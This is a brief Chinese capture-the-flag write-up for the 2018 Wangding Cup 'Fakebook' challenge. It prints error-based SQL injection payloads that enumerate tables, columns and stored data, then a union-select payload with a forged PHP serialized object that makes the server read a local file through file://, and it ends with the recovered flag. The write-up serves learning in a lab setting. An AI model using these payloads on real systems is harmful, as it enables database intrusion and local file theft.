[网鼎杯 2018]Fakebook

---

[网鼎杯 2018]Fakebook

不会，贴大佬的文章
https://blog.csdn.net/qq_42196196/article/details/81952174?depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-1&utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-1

下面是学到的内容
这个是报错注入的另一种情形，首先发现注入点是在user用户界面，即：view.php页面处，参数是no=1
查表payload

view.php?no=1 and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#

表：users
查列payload

view.php?no=1 and updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name="users")),1)#

列：no,username,passwd,data,USER,C
查字段payload

view.php?no=1 and updatexml(1,make_set(3,'~',(select data from users)),1)#

可以看到是反序列化后的结果

view.php?no=1 and updatexml(1,make_set(3,'~',(select(group_concat((right(data,27))))from(users))),1)#

可以通过修改27处的数字拼接反序列化后的内容
看大佬的构造的payload，慢慢体会，相信一定会获得收获。

view.php?no=0/**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

没回显，查看源码后发现iframe的内容已经改变了，点开链接就发现了flag

<?php
$flag = "flag{ad6acf06-30a0-4793-b057-d16917117100}";
exit(0);

学到的更多的是报错注入
然后就是robots.txt里的文件内容的利用实在上面最后的构造payload处，即：s:4:“blog”;s:29:“file:///var/www/html/flag.php”;
所给的php文件对blog链接进行了curl操作所以利用一下，具体怎么利用，在本文开始的大佬链接处，请参考。

---

-完-